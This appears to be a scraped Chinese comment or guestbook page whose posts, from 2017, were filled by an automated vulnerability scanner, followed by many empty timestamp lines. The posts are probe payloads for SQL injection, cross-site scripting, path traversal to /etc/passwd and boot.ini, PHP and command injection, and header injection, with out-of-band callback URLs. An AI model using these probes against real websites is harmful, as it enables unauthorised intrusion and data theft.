88888 發表于 - 2017-08-24 02:26:32
88888 AND 1997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(99)||CHR(97)||CHR(100),5) :
88888 發表于 - 2017-08-24 02:26:33
88888 :
88888 發表于 - 2017-08-24 02:26:33
88888 :
88888 發表于 - 2017-08-24 02:26:34
88888 OR 1997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(99)||CHR(97)||CHR(100),5) :
88888 發表于 - 2017-08-24 02:26:34
88888 :
88888 發表于 - 2017-08-24 02:26:34
88888 AND PG_SLEEP(5) :
88888 發表于 - 2017-08-24 02:26:35
88888 :
88888 發表于 - 2017-08-24 02:26:35
88888 AND 1997=PG_SLEEP(5) :
88888 發表于 - 2017-08-24 02:26:35
88888AND 1997=(SELECT 5 FROM PG_SLEEP(5)) :
88888 發表于 - 2017-08-24 02:26:36
88888 :
88888 發表于 - 2017-08-24 02:26:37
88888 :
88888 發表于 - 2017-08-24 02:26:38
888881 :
88888 發表于 - 2017-08-24 02:26:38
88888 :
88888<a href=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#50&#51&#52&#53&#41>TEST</a> 發表于 - 2017-08-24 02:27:23
88888 :
88888 發表于 - 2017-08-24 02:27:50
88888<a href=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#50&#51&#52&#53&#41>TEST</a> :
88888 發表于 - 2017-08-24 02:27:52
88888 :
88888<a href=//webscan.#/>webscan</a> 發表于 - 2017-08-24 02:29:06
88888 :
88888%27 發表于 - 2017-08-24 02:29:49
88888 :
88888 發表于 - 2017-08-24 02:29:50
88888<a href=//webscan.#/>webscan</a> :
88888 發表于 - 2017-08-24 02:29:57
88888 :
88888" 發表于 - 2017-08-24 02:30:25
88888 :
88888 發表于 - 2017-08-24 02:30:26
88888%27 :
88888 發表于 - 2017-08-24 02:30:27
88888 :
88888JyI= 發表于 - 2017-08-24 02:30:35
88888 :
88888 發表于 - 2017-08-24 02:31:06
88888" :
88888 發表于 - 2017-08-24 02:31:07
88888 :
88888e360 發表于 - 2017-08-24 02:31:15
88888 :
88888 發表于 - 2017-08-24 02:31:16
88888JyI= :
88888 發表于 - 2017-08-24 02:31:17
88888 :
888886633x3X6 發表于 - 2017-08-24 02:31:30
88888 :
88888 發表于 - 2017-08-24 02:32:08
88888e360 :
88888 發表于 - 2017-08-24 02:32:09
88888 :
88888[] 發表于 - 2017-08-24 02:32:17
88888 :
88888 發表于 - 2017-08-24 02:32:18
888886633x3X6 :
88888 發表于 - 2017-08-24 02:32:19
88888 :
發表于 - 2017-08-24 02:32:27
88888 :
88888/ 發表于 - 2017-08-24 02:33:09
88888 :
88888 發表于 - 2017-08-24 02:33:10
88888[] :
88888 發表于 - 2017-08-24 02:33:11
88888 :
88888) 發表于 - 2017-08-24 02:33:24
88888 :
88888 發表于 - 2017-08-24 02:33:30
88888 發表于 - 2017-08-24 02:33:31
88888 :
88888!(() 發表于 - 2017-08-24 02:33:39
88888 :
88888alert(42873) 發表于 - 2017-08-24 02:33:49
88888 :
88888 發表于 - 2017-08-24 02:33:50
88888/ :
88888 發表于 - 2017-08-24 02:33:51
88888 :
../../../../../../../../boot.ini 發表于 - 2017-08-24 02:34:03
88888 :
88888 發表于 - 2017-08-24 02:34:04
88888) :
88888 發表于 - 2017-08-24 02:34:05
88888 :
../../../../../../../../boot.ini 發表于 - 2017-08-24 02:34:13
88888 :
88888 發表于 - 2017-08-24 02:34:14
88888!(() :
88888 發表于 - 2017-08-24 02:34:15
88888 :
發表于 - 2017-08-24 02:34:27
88888 :
88888 發表于 - 2017-08-24 02:34:28
88888alert(42873) :
88888 發表于 - 2017-08-24 02:34:29
88888 :
../../../../../../../../boot.ini.jpg 發表于 - 2017-08-24 02:34:42
88888 :
88888 發表于 - 2017-08-24 02:34:43
../../../../../../../../boot.ini :
88888 發表于 - 2017-08-24 02:34:44
88888 :
../../../../../../../../boot.ini.html 發表于 - 2017-08-24 02:34:52
88888 :
88888 發表于 - 2017-08-24 02:34:53
../../../../../../../../boot.ini :
88888 發表于 - 2017-08-24 02:34:54
88888 :
/.\./.\./.\./.\./.\./.\./boot.ini 發表于 - 2017-08-24 02:35:02
88888 :
88888 發表于 - 2017-08-24 02:35:03
發表于 - 2017-08-24 02:35:03
88888 發表于 - 2017-08-24 02:35:04
88888 :
C:oot.ini 發表于 - 2017-08-24 02:35:12
88888 :
88888 發表于 - 2017-08-24 02:35:13
../../../../../../../../boot.ini.jpg :
88888 發表于 - 2017-08-24 02:35:14
88888 :
................oot.ini 發表于 - 2017-08-24 02:35:25
88888 :
88888 發表于 - 2017-08-24 02:35:31
../../../../../../../../boot.ini.html :
88888 發表于 - 2017-08-24 02:35:32
88888 :
../..//../..//../..//../..//../..//../..//../..//../..//boot.ini 發表于 - 2017-08-24 02:35:40
88888 :
88888 發表于 - 2017-08-24 02:35:41
/.\./.\./.\./.\./.\./.\./boot.ini :
88888 發表于 - 2017-08-24 02:35:42
88888 :
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini 發表于 - 2017-08-24 02:35:50
88888 :
88888 發表于 - 2017-08-24 02:35:51
C:oot.ini :
88888 發表于 - 2017-08-24 02:35:52
88888 :
發表于 - 2017-08-24 02:36:00
88888 :
88888 發表于 - 2017-08-24 02:36:01
................oot.ini :
88888 發表于 - 2017-08-24 02:36:02
88888 :
<................oot.ini 發表于 - 2017-08-24 02:36:10
88888 :
88888 發表于 - 2017-08-24 02:36:11
../..//../..//../..//../..//../..//../..//../..//../..//boot.ini :
88888 發表于 - 2017-08-24 02:36:12
88888 :
|................oot.ini 發表于 - 2017-08-24 02:36:25
88888 :
88888 發表于 - 2017-08-24 02:36:26
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini :
88888 發表于 - 2017-08-24 02:36:27
88888 :
../../../../../../../../boot.ini.htm 發表于 - 2017-08-24 02:36:41
88888 :
88888 發表于 - 2017-08-24 02:36:42
88888 發表于 - 2017-08-24 02:36:43
88888 :
../../../../../../../../boot.ini.txt 發表于 - 2017-08-24 02:36:51
88888 :
88888 發表于 - 2017-08-24 02:36:52
<................oot.ini :
88888 發表于 - 2017-08-24 02:36:53
88888 :
file:///c:/boot.ini 發表于 - 2017-08-24 02:37:01
88888 :
88888 發表于 - 2017-08-24 02:37:02
|................oot.ini :
88888 發表于 - 2017-08-24 02:37:03
88888 :
................windowswin.ini 發表于 - 2017-08-24 02:37:16
88888 :
88888 發表于 - 2017-08-24 02:37:17
../../../../../../../../boot.ini.htm :
88888 發表于 - 2017-08-24 02:37:18
88888 :
../../../../../../../../etc/passwd 發表于 - 2017-08-24 02:37:26
88888 :
88888 發表于 - 2017-08-24 02:37:27
../../../../../../../../boot.ini.txt :
88888 發表于 - 2017-08-24 02:37:28
88888 :
../../../../../../../../etc/passwd 發表于 - 2017-08-24 02:37:37
88888 :
88888 發表于 - 2017-08-24 02:37:37
file:///c:/boot.ini :
88888 發表于 - 2017-08-24 02:37:38
88888 :
../../../../../../../../etc/passwd 發表于 - 2017-08-24 02:37:46
88888 :
88888 發表于 - 2017-08-24 02:37:47
................windowswin.ini :
88888 發表于 - 2017-08-24 02:37:49
88888 :
../../../../../../../../etc/passwd.html 發表于 - 2017-08-24 02:38:01
88888 :
88888 發表于 - 2017-08-24 02:38:02
../../../../../../../../etc/passwd :
88888 發表于 - 2017-08-24 02:38:08
88888 :
../../../../../../../../etc/passwd.jpg 發表于 - 2017-08-24 02:38:16
88888 :
88888 發表于 - 2017-08-24 02:38:17
../../../../../../../../etc/passwd :
88888 發表于 - 2017-08-24 02:38:18
88888 :
.\./.\./.\./.\./.\./.\./etc/passwd 發表于 - 2017-08-24 02:38:26
88888 :
88888 發表于 - 2017-08-24 02:38:27
../../../../../../../../etc/passwd :
88888 發表于 - 2017-08-24 02:38:28
88888 :
/etc/passwd 發表于 - 2017-08-24 02:38:36
88888 :
88888 發表于 - 2017-08-24 02:38:37
../../../../../../../../etc/passwd.html :
88888 發表于 - 2017-08-24 02:38:38
88888 :
/./././././././etc/passwd 發表于 - 2017-08-24 02:38:49
88888 :
88888 發表于 - 2017-08-24 02:38:50
../../../../../../../../etc/passwd.jpg :
88888 發表于 - 2017-08-24 02:38:51
88888 :
................etc/passwd 發表于 - 2017-08-24 02:39:10
88888 :
88888 發表于 - 2017-08-24 02:39:11
.\./.\./.\./.\./.\./.\./etc/passwd :
88888 發表于 - 2017-08-24 02:39:12
88888 :
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 發表于 - 2017-08-24 02:39:20
88888 :
88888 發表于 - 2017-08-24 02:39:21
/etc/passwd :
88888 發表于 - 2017-08-24 02:39:22
88888 :
發表于 - 2017-08-24 02:39:30
88888 :
88888 發表于 - 2017-08-24 02:39:31
/./././././././etc/passwd :
88888 發表于 - 2017-08-24 02:39:32
88888 :
<../../../../../../../../etc/passwd 發表于 - 2017-08-24 02:39:40
88888 :
88888 發表于 - 2017-08-24 02:39:41
................etc/passwd :
88888 發表于 - 2017-08-24 02:39:42
88888 :
|../../../../../../../../etc/passwd 發表于 - 2017-08-24 02:39:50
88888 :
88888 發表于 - 2017-08-24 02:39:51
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd :
88888 發表于 - 2017-08-24 02:39:52
88888 :
發表于 - 2017-08-24 02:40:05
88888 :
88888 發表于 - 2017-08-24 02:40:06
88888 發表于 - 2017-08-24 02:40:07
88888 :
file:///etc/passwd 發表于 - 2017-08-24 02:40:15
88888 :
88888 發表于 - 2017-08-24 02:40:16
<../../../../../../../../etc/passwd :
88888 發表于 - 2017-08-24 02:40:17
88888 :
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 發表于 - 2017-08-24 02:40:31
88888 :
88888 發表于 - 2017-08-24 02:40:32
|../../../../../../../../etc/passwd :
88888 發表于 - 2017-08-24 02:40:33
88888 :
../../../../../../../../../../etc/passwd 發表于 - 2017-08-24 02:40:41
88888 :
88888 發表于 - 2017-08-24 02:40:42
88888 發表于 - 2017-08-24 02:40:43
88888 :
../../../../../../../../../../etc/passwd 發表于 - 2017-08-24 02:40:51
88888 :
88888 發表于 - 2017-08-24 02:40:52
file:///etc/passwd :
88888 發表于 - 2017-08-24 02:40:53
88888 :
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd 發表于 - 2017-08-24 02:41:01
88888 :
88888 發表于 - 2017-08-24 02:41:02
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd :
88888 發表于 - 2017-08-24 02:41:03
88888 :
.../.../.../.../.../.../.../.../etc/passwd 發表于 - 2017-08-24 02:41:11
88888 :
88888 發表于 - 2017-08-24 02:41:12
../../../../../../../../../../etc/passwd :
88888 發表于 - 2017-08-24 02:41:13
88888 :
................/etc/passwd 發表于 - 2017-08-24 02:41:21
88888 :
88888 發表于 - 2017-08-24 02:41:22
../../../../../../../../../../etc/passwd :
88888 發表于 - 2017-08-24 02:41:23
88888 :
................etc/passwd 發表于 - 2017-08-24 02:41:36
88888 :
88888 發表于 - 2017-08-24 02:41:37
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd :
88888 發表于 - 2017-08-24 02:41:44
88888 :
發表于 - 2017-08-24 02:41:52
88888 :
88888 發表于 - 2017-08-24 02:41:53
.../.../.../.../.../.../.../.../etc/passwd :
88888 發表于 - 2017-08-24 02:41:54
88888 :
../../../../../../../../etc/passwd 發表于 - 2017-08-24 02:42:02
88888 :
88888 發表于 - 2017-08-24 02:42:03
................/etc/passwd :
88888 發表于 - 2017-08-24 02:42:04
88888 :
../../../../../../../../etc/passwd 發表于 - 2017-08-24 02:42:11
88888 :
88888 發表于 - 2017-08-24 02:42:12
................etc/passwd :
88888 發表于 - 2017-08-24 02:42:13
88888 :
................etc/passwd 發表于 - 2017-08-24 02:42:20
88888 :
88888 發表于 - 2017-08-24 02:42:21
88888 發表于 - 2017-08-24 02:42:22
88888 :
http://some-inexistent-website.com/some_inexistent_file_with_long_name 發表于 - 2017-08-24 02:42:34
88888 :
88888 發表于 - 2017-08-24 02:42:35
../../../../../../../../etc/passwd :
88888 發表于 - 2017-08-24 02:42:36
88888 :
/some_inexistent_file_with_long_name 發表于 - 2017-08-24 02:42:43
88888 :
88888 發表于 - 2017-08-24 02:42:44
../../../../../../../../etc/passwd :
88888 發表于 - 2017-08-24 02:42:45
88888 :
SomeCustomInjectedHeader:injected_by_test 發表于 - 2017-08-24 02:42:52
88888 :
88888 發表于 - 2017-08-24 02:42:53
................etc/passwd :
88888 發表于 - 2017-08-24 02:42:54
88888 :
SomeCustomInjectedHeader:injected_by_test 發表于 - 2017-08-24 02:43:01
88888 :
88888 發表于 - 2017-08-24 02:43:02
http://some-inexistent-website.com/some_inexistent_file_with_long_name :
88888 發表于 - 2017-08-24 02:43:03
88888 :
SomeCustomInjectedHeader:injected_by_test 發表于 - 2017-08-24 02:43:10
88888 :
88888 發表于 - 2017-08-24 02:43:11
/some_inexistent_file_with_long_name :
88888 發表于 - 2017-08-24 02:43:12
88888 :
dir 發表于 - 2017-08-24 02:43:19
88888 :
88888 發表于 - 2017-08-24 02:43:20
SomeCustomInjectedHeader:injected_by_test :
88888 發表于 - 2017-08-24 02:43:21
88888 :
<dir 發表于 - 2017-08-24 02:43:28
88888 :
88888 發表于 - 2017-08-24 02:43:29
SomeCustomInjectedHeader:injected_by_test :
88888 發表于 - 2017-08-24 02:43:30
88888 :
http://oxoxoxoxoxoxox.com 發表于 - 2017-08-24 02:43:42
88888 :
88888 發表于 - 2017-08-24 02:43:49
SomeCustomInjectedHeader:injected_by_test :
88888 發表于 - 2017-08-24 02:43:50
88888 :
oxoxoxoxoxoxox.com 發表于 - 2017-08-24 02:43:57
88888 :
88888 發表于 - 2017-08-24 02:43:58
dir :
88888 發表于 - 2017-08-24 02:43:59
88888 :
88888 發表于 - 2017-08-24 02:44:07
<dir :
88888 發表于 - 2017-08-24 02:44:07
88888 :
88888 發表于 - 2017-08-24 02:44:14
http://oxoxoxoxoxoxox.com :
88888 發表于 - 2017-08-24 02:44:15
88888 :
88888 發表于 - 2017-08-24 02:44:22
oxoxoxoxoxoxox.com :
88888 發表于 - 2017-08-24 02:44:22
88888 :
${@print(md5(1122))} 發表于 - 2017-08-24 02:44:28
88888 :
phpinfo 發表于 - 2017-08-24 02:44:49
${@print(md5(1122))} :
88888 發表于 - 2017-08-24 02:44:57
88888 :
88888 發表于 - 2017-08-24 02:44:57
88888 :
88888 發表于 - 2017-08-24 02:45:10
phpinfo :
88888 發表于 - 2017-08-24 02:45:10
88888 :
http://hitBAo6EKQnyr.bxss.me/ 發表于 - 2017-08-24 02:45:41
88888 :
http://hitd0rQGQge8t.bxss.me/ 發表于 - 2017-08-24 02:45:46
88888 :
http://testasp.vulnweb.com/t/fit.txt 發表于 - 2017-08-24 02:45:50
88888 :
88888 發表于 - 2017-08-24 02:45:53
88888 :
set|set 發表于 - 2017-08-24 02:45:54
http://hitBAo6EKQnyr.bxss.me/ :
88888 發表于 - 2017-08-24 02:45:55
88888 :
88888 發表于 - 2017-08-24 02:45:57
http://hitd0rQGQge8t.bxss.me/ :
88888 發表于 - 2017-08-24 02:45:59
88888 :
88888 發表于 - 2017-08-24 02:46:01
88888 :
`ping -c 5 127.0.0.1` 發表于 - 2017-08-24 02:46:02
http://testasp.vulnweb.com/t/fit.txt :
88888 發表于 - 2017-08-24 02:46:03
88888 :
88888 發表于 - 2017-08-24 02:46:11
88888 :
|ping -n 5 127.0.0.1| 發表于 - 2017-08-24 02:46:11
set|set :
88888 發表于 - 2017-08-24 02:46:12
88888 :
|ping -c 4 127.0.0.1 發表于 - 2017-08-24 02:46:14
88888 :
88888 發表于 - 2017-08-24 02:46:23
88888 :
response.write(9412458*9542755) 發表于 - 2017-08-24 02:46:23
`ping -c 5 127.0.0.1` :
88888 發表于 - 2017-08-24 02:46:24
88888 :
88888 發表于 - 2017-08-24 02:46:26
88888 :
http://webscan.# 發表于 - 2017-08-24 02:46:26
|ping -n 5 127.0.0.1| :
88888 發表于 - 2017-08-24 02:46:27
88888 :
88888 發表于 - 2017-08-24 02:46:29
88888 :
${87654321-12345678} 發表于 - 2017-08-24 02:46:29
|ping -c 4 127.0.0.1 :
88888 發表于 - 2017-08-24 02:46:30
88888 :
88888 發表于 - 2017-08-24 02:46:32
88888 :
發表于 - 2017-08-24 02:46:32
response.write(9412458*9542755) :
88888 發表于 - 2017-08-24 02:46:33
88888 :
88888 發表于 - 2017-08-24 02:46:35
http://webscan.# :
88888 發表于 - 2017-08-24 02:46:36
88888 :
88888 發表于 - 2017-08-24 02:46:38
${87654321-12345678} :
88888 發表于 - 2017-08-24 02:46:39
88888 :
88888 發表于 - 2017-08-24 02:46:41
88888 發表于 - 2017-08-24 02:46:42
發表于 - 2017-08-24 03:22:20
發表于 - 2017-08-24 03:22:43
發表于 - 2017-08-24 03:22:58
發表于 - 2017-08-24 18:33:58
發表于 - 2017-08-24 22:11:21
發表于 - 2017-08-25 22:09:08
發表于 - 2017-08-26 22:15:43
發表于 - 2017-08-27 07:49:48
發表于 - 2017-08-28 15:54:23
發表于 - 2017-08-28 18:41:53
發表于 - 2017-08-29 03:43:03
發表于 - 2017-08-29 12:33:50
發表于 - 2017-08-29 12:35:12
發表于 - 2017-08-29 12:36:54
發表于 - 2017-08-29 12:38:54
發表于 - 2017-08-29 12:40:18
發表于 - 2017-08-29 12:42:17
發表于 - 2017-08-29 12:43:38
發表于 - 2017-08-29 12:45:39
發表于 - 2017-08-29 12:46:49
發表于 - 2017-08-29 12:48:33
發表于 - 2017-08-29 12:49:53
發表于 - 2017-08-29 12:51:34
發表于 - 2017-08-29 12:53:54
發表于 - 2017-08-29 12:55:17
發表于 - 2017-08-29 12:56:41
發表于 - 2017-08-29 12:58:03
發表于 - 2017-08-29 12:59:45
發表于 - 2017-08-29 13:01:26
發表于 - 2017-08-29 13:03:27
發表于 - 2017-08-29 13:04:51
發表于 - 2017-08-29 13:06:31
發表于 - 2017-08-29 13:08:11
發表于 - 2017-08-29 13:09:12
發表于 - 2017-08-29 13:10:55
發表于 - 2017-08-29 13:12:18
發表于 - 2017-08-29 13:14:18
發表于 - 2017-08-29 13:15:39
發表于 - 2017-08-29 13:17:41
發表于 - 2017-08-29 13:19:03
發表于 - 2017-08-29 13:20:27
發表于 - 2017-08-29 13:21:48
發表于 - 2017-08-29 13:23:49
發表于 - 2017-08-29 13:25:09
發表于 - 2017-08-29 13:27:29
發表于 - 2017-08-29 13:29:33
發表于 - 2017-08-29 13:31:36
發表于 - 2017-08-29 13:33:18
發表于 - 2017-08-29 13:34:58
發表于 - 2017-08-29 13:36:58
發表于 - 2017-08-29 13:38:22
發表于 - 2017-08-29 13:39:43
發表于 - 2017-08-29 13:41:44
發表于 - 2017-08-29 13:43:54
發表于 - 2017-08-29 13:46:24
發表于 - 2017-08-29 13:48:09
發表于 - 2017-08-29 13:50:09
發表于 - 2017-08-29 13:51:51
發表于 - 2017-08-29 13:54:32
發表于 - 2017-08-29 13:56:14
發表于 - 2017-08-29 13:57:55
發表于 - 2017-08-29 13:59:56
發表于 - 2017-08-29 14:01:18
發表于 - 2017-08-29 14:03:39
發表于 - 2017-08-29 14:04:59
發表于 - 2017-08-29 14:07:05
發表于 - 2017-08-29 14:08:07
發表于 - 2017-08-29 14:09:28
發表于 - 2017-08-29 14:11:08
發表于 - 2017-08-29 14:12:29
發表于 - 2017-08-29 14:14:13
發表于 - 2017-08-29 14:16:16
發表于 - 2017-08-29 14:17:38
發表于 - 2017-08-29 14:18:59
發表于 - 2017-08-29 14:20:40
發表于 - 2017-08-29 14:22:44
發表于 - 2017-08-29 14:24:25
發表于 - 2017-08-29 14:25:45
發表于 - 2017-08-29 14:27:25
發表于 - 2017-08-29 14:29:08
發表于 - 2017-08-29 22:50:01
發表于 - 2017-08-30 17:07:59
發表于 - 2017-08-30 22:13:14
發表于 - 2017-08-31 21:16:53
發表于 - 2017-08-31 22:10:01
發表于 - 2017-09-01 09:01:02
發表于 - 2017-09-01 19:16:14
發表于 - 2017-09-02 09:32:38
發表于 - 2017-09-02 22:21:32
發表于 - 2017-09-03 04:59:44
發表于 - 2017-09-04 15:00:35
發表于 - 2017-09-04 22:18:12
發表于 - 2017-09-06 21:30:19
發表于 - 2017-09-07 02:04:19
發表于 - 2017-09-07 17:25:54
發表于 - 2017-09-07 17:26:07
發表于 - 2017-09-07 17:26:27
發表于 - 2017-09-07 18:17:45
發表于 - 2017-09-07 20:06:07
發表于 - 2017-09-08 21:32:09
發表于 - 2017-09-09 10:06:54
發表于 - 2017-09-09 19:02:16
發表于 - 2017-09-12 14:49:57
發表于 - 2017-09-13 15:46:48
發表于 - 2017-09-14 01:31:10
發表于 - 2017-09-14 05:10:22
發表于 - 2017-09-15 01:36:37
發表于 - 2017-09-18 08:30:22
發表于 - 2017-09-19 18:21:12
發表于 - 2017-09-19 21:13:40
發表于 - 2017-09-20 22:05:12
發表于 - 2017-09-21 05:21:08
發表于 - 2017-09-21 11:06:18
發表于 - 2017-09-21 22:07:46
發表于 - 2017-09-22 09:13:45
發表于 - 2017-09-22 12:40:40
發表于 - 2017-09-22 13:24:12
發表于 - 2017-09-22 22:48:19
發表于 - 2017-09-23 04:00:59
發表于 - 2017-09-24 07:29:38
發表于 - 2017-09-24 10:59:31
發表于 - 2017-09-25 04:00:36
發表于 - 2017-09-25 22:16:18
發表于 - 2017-09-26 03:19:44
發表于 - 2017-09-26 09:00:03
發表于 - 2017-09-26 17:25:33
發表于 - 2017-09-27 15:10:40
發表于 - 2017-09-27 15:19:26
發表于 - 2017-09-27 18:14:31
發表于 - 2017-09-30 10:07:17
發表于 - 2017-09-30 10:40:38
發表于 - 2017-10-01 19:42:12
發表于 - 2017-10-03 10:32:58
發表于 - 2017-10-03 10:52:54
發表于 - 2017-10-03 10:52:55
發表于 - 2017-10-03 10:53:09
發表于 - 2017-10-03 10:57:39
發表于 - 2017-10-03 10:59:01
發表于 - 2017-10-03 10:59:31
發表于 - 2017-10-03 11:00:00
發表于 - 2017-10-03 11:00:10
發表于 - 2017-10-03 11:00:41
發表于 - 2017-10-03 11:01:21
發表于 - 2017-10-03 11:01:51
發表于 - 2017-10-03 11:02:01
發表于 - 2017-10-03 11:02:12
發表于 - 2017-10-03 11:03:24
88888 :
88888 發表于 - 2017-10-03 11:16:53
88888 :
88888 發表于 - 2017-10-03 11:16:53
88888 :
88888 發表于 - 2017-10-03 11:16:54
88888 :
88888 AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) # 發表于 - 2017-10-03 11:17:02
88888 :
88888 發表于 - 2017-10-03 11:17:09
88888 :
88888 發表于 - 2017-10-03 11:17:09
88888 :
88888 發表于 - 2017-10-03 11:17:10
88888 :
88888) AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) # 發表于 - 2017-10-03 11:17:14
88888 :
88888) AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) %23 發表于 - 2017-10-03 11:17:27
88888 :
88888 AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) %23 發表于 - 2017-10-03 11:17:28
88888 :
88888 發表于 - 2017-10-03 11:17:34
88888 :
88888 發表于 - 2017-10-03 11:17:35
88888 :
88888 AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) # 發表于 - 2017-10-03 11:17:36
88888 :
88888 發表于 - 2017-10-03 11:17:39
88888 :
88888 發表于 - 2017-10-03 11:17:41
88888 :
88888 發表于 - 2017-10-03 11:17:53
88888 :
88888) AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) # 發表于 - 2017-10-03 11:17:57
88888 :
88888 AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) %23 發表于 - 2017-10-03 11:17:58
88888 :
88888) AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) %23 發表于 - 2017-10-03 11:18:09
88888 :
88888) AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) AND (2014=2014 發表于 - 2017-10-03 11:18:15
88888 :
88888 AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) 發表于 - 2017-10-03 11:18:21
88888 :
88888 AND 1=CHAR(106)+CHAR(106)+CHAR(106) 發表于 - 2017-10-03 11:18:21
88888 AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) # :
88888 發表于 - 2017-10-03 11:18:23
88888) AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) # :
88888 發表于 - 2017-10-03 11:18:26
88888) AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) %23 :
88888 發表于 - 2017-10-03 11:18:34
88888 AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) %23 :
88888 發表于 - 2017-10-03 11:18:34
88888 AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) # :
88888 發表于 - 2017-10-03 11:18:35
88888 :
88888) AND 1=CHAR(106)+CHAR(106)+CHAR(106) -- 發表于 - 2017-10-03 11:18:37
88888 :
88888 發表于 - 2017-10-03 11:18:39
88888 :
88888 發表于 - 2017-10-03 11:18:41
88888 :
88888 發表于 - 2017-10-03 11:18:41
88888 :
88888 發表于 - 2017-10-03 11:18:48
88888 :
88888 發表于 - 2017-10-03 11:18:50
88888 :
88888 發表于 - 2017-10-03 11:18:54
88888 :
88888) AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) AND (2014=2014 發表于 - 2017-10-03 11:18:56
88888) AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) # :
88888 發表于 - 2017-10-03 11:18:58
88888 AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) %23 :
88888 發表于 - 2017-10-03 11:19:00
88888 :
88888 發表于 - 2017-10-03 11:19:06
88888) AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) %23 :
88888 發表于 - 2017-10-03 11:19:07
88888 :
88888 發表于 - 2017-10-03 11:19:09
88888 :
88888 發表于 - 2017-10-03 11:19:10
88888) AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) AND (2014=2014 :
88888 發表于 - 2017-10-03 11:19:17
88888 AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) :
88888 發表于 - 2017-10-03 11:19:18
88888 :
88888 發表于 - 2017-10-03 11:19:21
88888 AND 1=CHAR(106)+CHAR(106)+CHAR(106) :
88888 發表于 - 2017-10-03 11:19:22
88888 :
88888 發表于 - 2017-10-03 11:19:31
88888 :
88888 發表于 - 2017-10-03 11:19:32
88888 :
88888 發表于 - 2017-10-03 11:19:34
88888 :
88888 發表于 - 2017-10-03 11:19:35
88888 :
88888 發表于 - 2017-10-03 11:19:37
88888 :
88888 發表于 - 2017-10-03 11:19:38
88888 :
88888 發表于 - 2017-10-03 11:19:41
88888 :
88888 發表于 - 2017-10-03 11:19:42
88888 :
88888 發表于 - 2017-10-03 11:19:48
88888 :
88888 發表于 - 2017-10-03 11:19:48
88888 :
88888 發表于 - 2017-10-03 11:19:52
88888 :
88888 發表于 - 2017-10-03 11:19:52
88888 :
88888 發表于 - 2017-10-03 11:19:54
88888 :
88888 發表于 - 2017-10-03 11:19:54
88888 :
發表于 - 2017-10-03 11:19:54
88888 :
88888 發表于 - 2017-10-03 11:19:55
